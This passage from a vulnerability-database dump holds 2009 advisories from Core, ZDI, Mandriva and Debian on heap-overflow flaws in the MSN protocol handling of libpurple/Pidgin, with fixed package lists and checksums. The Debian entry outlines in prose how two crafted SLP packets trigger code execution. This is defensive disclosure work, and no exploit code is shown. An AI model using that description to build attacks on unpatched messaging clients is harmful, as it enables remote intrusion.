freely\r\nprovided that no fee is charged for this distribution and proper credit\r\nis given.\r\n\r\n\r\n14. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.8 (MingW32)\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\r\n\r\niEYEARECAAYFAkqLIpwACgkQyNibggitWa2yqgCeJ3qxJluj3aNZzz3Y6XPULeHa\r\nKG8AnRiJXqQ/XX2E0UKb1sQOeWGfJhIc\r\n=GQCO\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2009-08-19T00:00:00", "published": "2009-08-19T00:00:00", "id": "SECURITYVULNS:DOC:22344", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22344", "title": "CORE-2009-0727: Libpurple msn_slplink_process_msg() Arbitrary Write Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "cvelist": ["CVE-2009-1376"], "description": "ZDI-09-031: Multiple Vendor libpurple MSN Protocol SLP Message Heap Overflow\r\nVulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-09-031\r\nJune 8, 2009\r\n\r\n-- CVE ID:\r\nCVE-2009-1376\r\n\r\n-- Affected Vendors:\r\nAdium\r\nPidgin\r\n\r\n-- Affected Products:\r\nAdium Adiumx\r\nPidgin Pidgin\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nsystems with vulnerable installations of messaging applications that\r\nmake use of the libpurple library. User interaction is not required to\r\nexploit this vulnerability.\r\n\r\nThe specific flaw exists in the implementation of the MSN protocol,\r\nspecifically the handling of SLP messages. The function\r\nmsn_slplink_process_msg() fails to properly validate an offset value\r\nspecified in the SLP packet. By providing a specific value, an attacker\r\ncan overflow a heap buffer resulting in arbitrary code execution.\r\n\r\n-- Vendor Response:\r\nPidgin has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://pidgin.im/news/security/?id=32\r\n\r\n-- Disclosure Timeline:\r\n2009-02-25 - Vulnerability reported to vendor\r\n2009-06-08 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Loc VALBON\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents\r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/", "edition": 1, "modified": "2009-06-09T00:00:00", "published": "2009-06-09T00:00:00", "id": "SECURITYVULNS:DOC:21963", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21963", "title": "ZDI-09-031: libpurple MSN Protocol SLP Message Heap Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:09:40", "bulletinFamily": "software", "cvelist": ["CVE-2008-2927", "CVE-2009-1376"], "description": "Buffer overflow on MSN SLP messages parsing.", "edition": 2, "modified": "2009-06-09T00:00:00", "published": "2009-06-09T00:00:00", "id": "SECURITYVULNS:VULN:9250", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9250", "title": "libpurple / Pidgin buffer overflow", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:31", "bulletinFamily": "software", "cvelist": ["CVE-2009-3084", "CVE-2009-3085", "CVE-2009-3025", "CVE-2009-3083", "CVE-2009-1376", "CVE-2009-3026", "CVE-2009-2703", "CVE-2009-2694"], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2009:230\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : pidgin\r\n Date : September 11, 2009\r\n Affected: 2009.0, 2009.1, Enterprise Server 5.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Security vulnerabilities has been identified and fixed in pidgin:\r\n \r\n The msn_slplink_process_msg function in\r\n libpurple/protocols/msn/slplink.c in libpurple, as used in Pidgin\r\n (formerly Gaim) before 2.5.9 and Adium 1.3.5 and earlier, allows\r\n remote attackers to execute arbitrary code or cause a denial of service\r\n (memory corruption and application crash) by sending multiple crafted\r\n SLP (aka MSNSLP) messages to trigger an overwrite of an arbitrary\r\n memory location. NOTE: this issue reportedly exists because of an\r\n incomplete fix for CVE-2009-1376 (CVE-2009-2694).\r\n \r\n Unspecified vulnerability in Pidgin 2.6.0 allows remote attackers\r\n to cause a denial of service (crash) via a link in a Yahoo IM\r\n (CVE-2009-3025)\r\n \r\n protocols/jabber/auth.c in libpurple in Pidgin 2.6.0, and possibly\r\n other versions, does not follow the require TLS/SSL preference\r\n when connecting to older Jabber servers that do not follow the XMPP\r\n specification, which causes libpurple to connect to the server without\r\n the expected encryption and allows remote attackers to sniff sessions\r\n (CVE-2009-3026).\r\n \r\n libpurple/protocols/irc/msgs.c in the IRC protocol plugin in libpurple\r\n in Pidgin before 2.6.2 allows remote IRC servers to cause a denial\r\n of service (NULL pointer dereference and application crash) via a\r\n TOPIC message that lacks a topic string (CVE-2009-2703).\r\n \r\n The msn_slp_sip_recv function in libpurple/protocols/msn/slp.c in the\r\n MSN protocol plugin in libpurple in Pidgin before 2.6.2 allows remote\r\n attackers to cause a denial of service (NULL pointer dereference\r\n and application crash) via an SLP invite message that lacks certain\r\n required fields, as demonstrated by a malformed message from a KMess\r\n client (CVE-2009-3083).\r\n \r\n The msn_slp_process_msg function in libpurple/protocols/msn/slpcall.c\r\n in the MSN protocol plugin in libpurple 2.6.0 and 2.6.1, as used in\r\n Pidgin before 2.6.2, allows remote attackers to cause a denial of\r\n service (application crash) via a handwritten (aka Ink) message,\r\n related to an uninitialized variable and the incorrect UTF16-LE\r\n charset name (CVE-2009-3084).\r\n \r\n The XMPP protocol plugin in libpurple in Pidgin before 2.6.2 does\r\n not properly handle an error IQ stanza during an attempted fetch of\r\n a custom smiley, which allows remote attackers to cause a denial of\r\n service (application crash) via XHTML-IM content with cid: images\r\n (CVE-2009-3085).\r\n \r\n This update provides pidgin 2.6.2, which is not vulnerable to these\r\n issues.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3025\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3026\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2703\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3083\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3084\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3085\r\n http://pidgin.im/news/security/\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2009.0:\r\n dd2135de88f01028217b4146dbfdabc0 2009.0/i586/finch-2.6.2-1.1mdv2009.0.i586.rpm\r\n 0a62ef0d115db1d059ba8683d8b78543 2009.0/i586/libfinch0-2.6.2-1.1mdv2009.0.i586.rpm\r\n d9138da684311ab0e77748b5d9251324 2009.0/i586/libpurple0-2.6.2-1.1mdv2009.0.i586.rpm\r\n a795ae8b0a6d37dae3cdd5d626a1054b 2009.0/i586/libpurple-devel-2.6.2-1.1mdv2009.0.i586.rpm\r\n e02ee9ac19b50b6313ab7e95955fc7dd 2009.0/i586/pidgin-2.6.2-1.1mdv2009.0.i586.rpm\r\n d9da1b8df1a61a3c6a61fb661d0af935 2009.0/i586/pidgin-bonjour-2.6.2-1.1mdv2009.0.i586.rpm\r\n fa74aa490a4a78a443f78273bd80c129 2009.0/i586/pidgin-client-2.6.2-1.1mdv2009.0.i586.rpm\r\n fba34f0c6056aaeda170fb38bafc50f8 2009.0/i586/pidgin-gevolution-2.6.2-1.1mdv2009.0.i586.rpm\r\n aa062eba94ee8a8857241879f83bb680 2009.0/i586/pidgin-i18n-2.6.2-1.1mdv2009.0.i586.rpm\r\n 3583204db49425789559de87f9c20e84 2009.0/i586/pidgin-meanwhile-2.6.2-1.1mdv2009.0.i586.rpm\r\n 83e2b09d13dc5880ce3779a659fa6edd 2009.0/i586/pidgin-mono-2.6.2-1.1mdv2009.0.i586.rpm\r\n 13115c52a371163466c9f8fb02c3b3f1 2009.0/i586/pidgin-perl-2.6.2-1.1mdv2009.0.i586.rpm\r\n 57c8369439d8ac73444f881e47bc7c7b 2009.0/i586/pidgin-plugins-2.6.2-1.1mdv2009.0.i586.rpm\r\n 1fe519efa96037e5b95360e6967fa872 2009.0/i586/pidgin-silc-2.6.2-1.1mdv2009.0.i586.rpm\r\n ab47db7786ec117a66317dc91328117c 2009.0/i586/pidgin-tcl-2.6.2-1.1mdv2009.0.i586.rpm \r\n 3c72a8f93d85a71a5ec62065c71ac866 2009.0/SRPMS/pidgin-2.6.2-1.1mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.0/X86_64:\r\n abe40e3b46e70d0f74c5b4195d4a7573 2009.0/x86_64/finch-2.6.2-1.1mdv2009.0.x86_64.rpm\r\n 1895ed3c44f5eb3bf08bba3d0d44329a 2009.0/x86_64/lib64finch0-2.6.2-1.1mdv2009.0.x86_64.rpm\r\n 16bcdf679539693dea8d115d6f4f57fa 2009.0/x86_64/lib64purple0-2.6.2-1.1mdv2009.0.x86_64.rpm\r\n 5359a59e9ddd524f3fe2e61374391e6c 2009.0/x86_64/lib64purple-devel-2.6.2-1.1mdv2009.0.x86_64.rpm\r\n c59fedcacf46d230776c1fa588d2370d 2009.0/x86_64/pidgin-2.6.2-1.1mdv2009.0.x86_64.rpm\r\n e4f7f1dded3d1de9ba3a7cb3251382ab 2009.0/x86_64/pidgin-bonjour-2.6.2-1.1mdv2009.0.x86_64.rpm\r\n 9c8326b381dc152f4121ab43104fca70 2009.0/x86_64/pidgin-client-2.6.2-1.1mdv2009.0.x86_64.rpm\r\n c7f718a011414a1c2a30dc3c765fa57f 2009.0/x86_64/pidgin-gevolution-2.6.2-1.1mdv2009.0.x86_64.rpm\r\n 5a272130a6b76313263567fa4e4eb405 2009.0/x86_64/pidgin-i18n-2.6.2-1.1mdv2009.0.x86_64.rpm\r\n c7ca5393d5b3c26c7969e1935f0f081f 2009.0/x86_64/pidgin-meanwhile-2.6.2-1.1mdv2009.0.x86_64.rpm\r\n a352742a2c74ab2dee0fe923d8088b09 2009.0/x86_64/pidgin-mono-2.6.2-1.1mdv2009.0.x86_64.rpm\r\n 3a7ea7015ba7e4631629a6561969c5f1 2009.0/x86_64/pidgin-perl-2.6.2-1.1mdv2009.0.x86_64.rpm\r\n 673250d99488d52ac182234a977270c5 2009.0/x86_64/pidgin-plugins-2.6.2-1.1mdv2009.0.x86_64.rpm\r\n b0b24b820b40b8ae0ea50b861cb24816 2009.0/x86_64/pidgin-silc-2.6.2-1.1mdv2009.0.x86_64.rpm\r\n cde1df5b06fdd9a7f3abdacd519a4ded 2009.0/x86_64/pidgin-tcl-2.6.2-1.1mdv2009.0.x86_64.rpm \r\n 3c72a8f93d85a71a5ec62065c71ac866 2009.0/SRPMS/pidgin-2.6.2-1.1mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.1:\r\n a0dae5ebcc277d8a42dfbbbc273e2e7c 2009.1/i586/finch-2.6.2-1.1mdv2009.1.i586.rpm\r\n 3e31c84ecf92b24da7e63fda3e6bc57e 2009.1/i586/libfinch0-2.6.2-1.1mdv2009.1.i586.rpm\r\n 6c2e1b9d19fc77f438517512666d8015 2009.1/i586/libpurple0-2.6.2-1.1mdv2009.1.i586.rpm\r\n 924014945b93ced26931d96e7872b2ae 2009.1/i586/libpurple-devel-2.6.2-1.1mdv2009.1.i586.rpm\r\n 0c78dd3ef63b1e14bc1f881a8c15fecb 2009.1/i586/pidgin-2.6.2-1.1mdv2009.1.i586.rpm\r\n 3038bfbd661e5d467dec2c2ac9550b16 2009.1/i586/pidgin-bonjour-2.6.2-1.1mdv2009.1.i586.rpm\r\n ea7a7a8d951f6deb0d68cfc162868a6a 2009.1/i586/pidgin-client-2.6.2-1.1mdv2009.1.i586.rpm\r\n cb312d06aa0365d38e393c7625171e62 2009.1/i586/pidgin-gevolution-2.6.2-1.1mdv2009.1.i586.rpm\r\n c8bfc1d06999ea0db358cbb008e51094 2009.1/i586/pidgin-i18n-2.6.2-1.1mdv2009.1.i586.rpm\r\n b46996777660d0818dc1c3987ab698dc 2009.1/i586/pidgin-meanwhile-2.6.2-1.1mdv2009.1.i586.rpm\r\n c761eb32c26ffd738b2ad3b61f78c011 2009.1/i586/pidgin-mono-2.6.2-1.1mdv2009.1.i586.rpm\r\n aaba734ce1fd0425395132ce28e76c6b 2009.1/i586/pidgin-perl-2.6.2-1.1mdv2009.1.i586.rpm\r\n 4b7f6d886dda8a7e89a56e6cd459b888 2009.1/i586/pidgin-plugins-2.6.2-1.1mdv2009.1.i586.rpm\r\n 28c71dbe522e6c2315c0092b5c68f6a6 2009.1/i586/pidgin-silc-2.6.2-1.1mdv2009.1.i586.rpm\r\n 0aaa2db43643a3f2a471b5d29b89e794 2009.1/i586/pidgin-tcl-2.6.2-1.1mdv2009.1.i586.rpm \r\n 3607769d564d6cead9e66ddc97e90c26 2009.1/SRPMS/pidgin-2.6.2-1.1mdv2009.1.src.rpm\r\n\r\n Mandriva Linux 2009.1/X86_64:\r\n 5996a662fd63ef72540432b9e723e376 2009.1/x86_64/finch-2.6.2-1.1mdv2009.1.x86_64.rpm\r\n 5daefd3daff1323ae6befca7ffeccf6d 2009.1/x86_64/lib64finch0-2.6.2-1.1mdv2009.1.x86_64.rpm\r\n 29c6cff6af5047f1c1e8c0e9cab1b343 2009.1/x86_64/lib64purple0-2.6.2-1.1mdv2009.1.x86_64.rpm\r\n 129363e98df30501bb591131f3b71974 2009.1/x86_64/lib64purple-devel-2.6.2-1.1mdv2009.1.x86_64.rpm\r\n 1dca4950a84ee467a1db32e33c272493 2009.1/x86_64/pidgin-2.6.2-1.1mdv2009.1.x86_64.rpm\r\n efc25c6b71ae970de073641feed3d222 2009.1/x86_64/pidgin-bonjour-2.6.2-1.1mdv2009.1.x86_64.rpm\r\n f57802d311e6676c359db58ce4f6c898 2009.1/x86_64/pidgin-client-2.6.2-1.1mdv2009.1.x86_64.rpm\r\n 3673312d1746554834679c0dd66f900a 2009.1/x86_64/pidgin-gevolution-2.6.2-1.1mdv2009.1.x86_64.rpm\r\n 6b4edbc3cbd95c4b73f199ec3dd07544 2009.1/x86_64/pidgin-i18n-2.6.2-1.1mdv2009.1.x86_64.rpm\r\n 07ddc3ebd9baa319fa42327ace7a51c1 2009.1/x86_64/pidgin-meanwhile-2.6.2-1.1mdv2009.1.x86_64.rpm\r\n d3c41c1ef9cd7baa9febd7d073ef09a4 2009.1/x86_64/pidgin-mono-2.6.2-1.1mdv2009.1.x86_64.rpm\r\n 6ce2b600ff76999460c7e8ed7ef81904 2009.1/x86_64/pidgin-perl-2.6.2-1.1mdv2009.1.x86_64.rpm\r\n d8be6a2e6bbba229edd7d7abcbf2ef76 2009.1/x86_64/pidgin-plugins-2.6.2-1.1mdv2009.1.x86_64.rpm\r\n 7ae3fdc1561a478052e2a3fe65488966 2009.1/x86_64/pidgin-silc-2.6.2-1.1mdv2009.1.x86_64.rpm\r\n 308d2a35011d9093973b393199de7393 2009.1/x86_64/pidgin-tcl-2.6.2-1.1mdv2009.1.x86_64.rpm \r\n 3607769d564d6cead9e66ddc97e90c26 2009.1/SRPMS/pidgin-2.6.2-1.1mdv2009.1.src.rpm\r\n\r\n Mandriva Enterprise Server 5:\r\n 6a1a28fb7bb3037ae1528e792417300b mes5/i586/finch-2.6.2-1.1mdvmes5.i586.rpm\r\n 7f56781f36c71c0839741b728586ef85 mes5/i586/libfinch0-2.6.2-1.1mdvmes5.i586.rpm\r\n f45ee50ed79e8101375a9236f937d658 mes5/i586/libpurple0-2.6.2-1.1mdvmes5.i586.rpm\r\n b0455640d7149d9ad025ae42fce61b72 mes5/i586/libpurple-devel-2.6.2-1.1mdvmes5.i586.rpm\r\n 487fa34cda5ebd172673c4232a3009d3 mes5/i586/pidgin-2.6.2-1.1mdvmes5.i586.rpm\r\n 38220a322dc8b3fc2a264fb2bae2e54f mes5/i586/pidgin-bonjour-2.6.2-1.1mdvmes5.i586.rpm\r\n 9a6d4add9297029d774a3f4483be769f mes5/i586/pidgin-client-2.6.2-1.1mdvmes5.i586.rpm\r\n 5b4b62dd8555dc4b43d475c5dc04ff37 mes5/i586/pidgin-gevolution-2.6.2-1.1mdvmes5.i586.rpm\r\n adb1072ce88c0a95afb2a41b07471f69 mes5/i586/pidgin-i18n-2.6.2-1.1mdvmes5.i586.rpm\r\n 3f2d24e39f650e1ce198b3555881d52f mes5/i586/pidgin-meanwhile-2.6.2-1.1mdvmes5.i586.rpm\r\n 70cc2085acb78b0a75df07c8d44122a6 mes5/i586/pidgin-mono-2.6.2-1.1mdvmes5.i586.rpm\r\n 2fc80c8e5d350ea77dbaf3bf53e738c9 mes5/i586/pidgin-perl-2.6.2-1.1mdvmes5.i586.rpm\r\n 9bb6bb95f035abec1d8db99fb7a95a94 mes5/i586/pidgin-plugins-2.6.2-1.1mdvmes5.i586.rpm\r\n 0e8e10245b3b2b2793e9830ebad65c9f mes5/i586/pidgin-silc-2.6.2-1.1mdvmes5.i586.rpm\r\n 87005bd59df0e60db09773f5ad51c65c mes5/i586/pidgin-tcl-2.6.2-1.1mdvmes5.i586.rpm \r\n c5ba16d383624512a2accea0e49127e1 mes5/SRPMS/pidgin-2.6.2-1.1mdvmes5.src.rpm\r\n\r\n Mandriva Enterprise Server 5/X86_64:\r\n 48559a9fbd602829a9018da470c737b7 mes5/x86_64/finch-2.6.2-1.1mdvmes5.x86_64.rpm\r\n efc52b721d74bd54957d8381160930ae mes5/x86_64/lib64finch0-2.6.2-1.1mdvmes5.x86_64.rpm\r\n cfa40992e6268de48742d863937a3ce5 mes5/x86_64/lib64purple0-2.6.2-1.1mdvmes5.x86_64.rpm\r\n 551c32363db750e426e3ba6aa482aa1b mes5/x86_64/lib64purple-devel-2.6.2-1.1mdvmes5.x86_64.rpm\r\n f772d231fa7f5bfa83d7448b977ac9e4 mes5/x86_64/pidgin-2.6.2-1.1mdvmes5.x86_64.rpm\r\n 5e36d866ed4aead171f62b0ff52f86de mes5/x86_64/pidgin-bonjour-2.6.2-1.1mdvmes5.x86_64.rpm\r\n 8e93da5c587e1fc463c23a1e202c506f mes5/x86_64/pidgin-client-2.6.2-1.1mdvmes5.x86_64.rpm\r\n 35a37384b53cb597b796ce269b947c0c mes5/x86_64/pidgin-gevolution-2.6.2-1.1mdvmes5.x86_64.rpm\r\n 6d8a79d2da3c94034e9db65464304cba mes5/x86_64/pidgin-i18n-2.6.2-1.1mdvmes5.x86_64.rpm\r\n be05186873330aca1a05143c7380b5e1 mes5/x86_64/pidgin-meanwhile-2.6.2-1.1mdvmes5.x86_64.rpm\r\n 669c51511f0c04f40779dd73e0c9f50d mes5/x86_64/pidgin-mono-2.6.2-1.1mdvmes5.x86_64.rpm\r\n 79bd83d747fa3e48d2ce18e8e5abb588 mes5/x86_64/pidgin-perl-2.6.2-1.1mdvmes5.x86_64.rpm\r\n 48eb4e61676abc78e769a0f660148814 mes5/x86_64/pidgin-plugins-2.6.2-1.1mdvmes5.x86_64.rpm\r\n 6c37ac6cbf4e83b8a4e09bfc62776d73 mes5/x86_64/pidgin-silc-2.6.2-1.1mdvmes5.x86_64.rpm\r\n 47262f2e661db28512c40710d9a59113 mes5/x86_64/pidgin-tcl-2.6.2-1.1mdvmes5.x86_64.rpm \r\n c5ba16d383624512a2accea0e49127e1 mes5/SRPMS/pidgin-2.6.2-1.1mdvmes5.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niD8DBQFKqkbImqjQ0CJFipgRAmItAKDwmkCL6bbeJfrQn7f0X8X1kUsE/gCeJQLu\r\neZC/xky0aMktS6+I56SNZh0=\r\n=rl3L\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2009-09-14T00:00:00", "published": "2009-09-14T00:00:00", "id": "SECURITYVULNS:DOC:22463", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22463", "title": "[ MDVSA-2009:230 ] pidgin", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:45:39", "bulletinFamily": "software", "cvelist": ["CVE-2009-3084", "CVE-2009-2694"], "description": "Memory corruption on malformed MSN protocol message.", "edition": 2, "modified": "2009-08-19T00:00:00", "published": "2009-08-19T00:00:00", "id": "SECURITYVULNS:VULN:10165", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10165", "title": "Libpurple / Pidgin memory corruption", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2020-11-11T13:24:05", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-2694"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA-1870-1 security@debian.org\nhttp://www.debian.org/security/ Nico Golde\nAugust 19th, 2009 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : pidgin\nVulnerability : insufficient input validation\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2009-2694\n\nFederico Muttis discovered that libpurple, the shared library that adds\nsupport for various instant messaging networks to the pidgin IM client, is\nvulnerable to a heap-based buffer overflow. This issue exists because of\nan incomplete fix for CVE-2008-2927 and CVE-2009-1376. An attacker can\nexploit this by sending two consecutive SLP packets to a victim via MSN.\n\nThe first packet is used to create an SLP message object with an offset of\nzero, the second packet then contains a crafted offset which hits the\nvulnerable code originally fixed in CVE-2008-2927 and CVE-2009-1376 and\nallows an attacker to execute arbitrary code.\n\nNote: Users with the "Allow only the users below" setting are not vulnerable\n to this attack. If you can't install the below updates you may want to\n set this via Tools->Privacy.\n\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 2.4.3-4lenny3.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.5.9-1.\n\nWe recommend that you upgrade your pidgin packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3.orig.tar.gz\n Size/MD5 checksum: 13123610 d0e0bd218fbc67df8b2eca2f21fcd427\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny3.dsc\n Size/MD5 checksum: 1784 e9bc246ba4f0ca8dab1436d66bd00adb\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny3.diff.gz\n Size/MD5 checksum: 67928 545981a43e8c1b905ea1adb0da9b1b4d\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple-bin_2.4.3-4lenny3_all.deb\n Size/MD5 checksum: 133552 d4adb0ff7da09da14d34f3ae9484ea94\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-data_2.4.3-4lenny3_all.deb\n Size/MD5 checksum: 7018488 09b2f817c71774e2108b4366602f5dcf\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple-dev_2.4.3-4lenny3_all.deb\n Size/MD5 checksum: 276890 dab9b30c46f9a2c03af02d381cb029cf\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dev_2.4.3-4lenny3_all.deb\n Size/MD5 checksum: 354146 291a984ea00f92d67a3d0b99040d7d72\n http://security.debian.org/pool/updates/main/p/pidgin/finch-dev_2.4.3-4lenny3_all.deb\n Size/MD5 checksum: 159388 f73823fb36f1d0487cc29d0d71a7a471\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny3_alpha.deb\n Size/MD5 checksum: 369628 cd01f407199d1ca84f2502c4f4d169db\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny3_alpha.deb\n Size/MD5 checksum: 779192 fdb6b047a48f3c255fa13a329dc5fc35\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny3_alpha.deb\n Size/MD5 checksum: 5545960 fe294dfeb4dd7ca7ff6e5636230c856c\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny3_alpha.deb\n Size/MD5 checksum: 1803004 81ef9e0af747f0b236b25b1407d38266\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny3_amd64.deb\n Size/MD5 checksum: 345894 4b31436a96b5834d8ebe3639b837093d\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny3_amd64.deb\n Size/MD5 checksum: 5668550 58b27242ababd545a49b080527cd8769\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny3_amd64.deb\n Size/MD5 checksum: 722220 e249e5fb7581ec28a0f4e0a32fab3d2c\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny3_amd64.deb\n Size/MD5 checksum: 1706142 2f1f823ff5c26eb1cc67874633a6891d\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny3_arm.deb\n Size/MD5 checksum: 315182 d935ef53df9f333d0b2eb8d38e2bb753\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny3_arm.deb\n Size/MD5 checksum: 655088 8631310cc8beb7902fef81b51af01fd8\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny3_arm.deb\n Size/MD5 checksum: 1490226 cfe0d6727f4a9aa671a3413817fb11ae\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny3_arm.deb\n Size/MD5 checksum: 5348504 d1ef7ddf61f0e44f46c646e4f4add280\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny3_armel.deb\n Size/MD5 checksum: 5386792 c5d2643ba6bc47aa41de04b870bbca3d\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny3_armel.deb\n Size/MD5 checksum: 666444 507fd3b558360b054d67843f3dba2689\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny3_armel.deb\n Size/MD5 checksum: 318828 fcaea331f126eb2329bf54d0c8df7269\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny3_armel.deb\n Size/MD5 checksum: 1496868 1ac8d58c00019b1b0a3d742d4a02d074\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny3_hppa.deb\n Size/MD5 checksum: 361112 366c71f9035322402a6c0bae4fe4d8a0\n 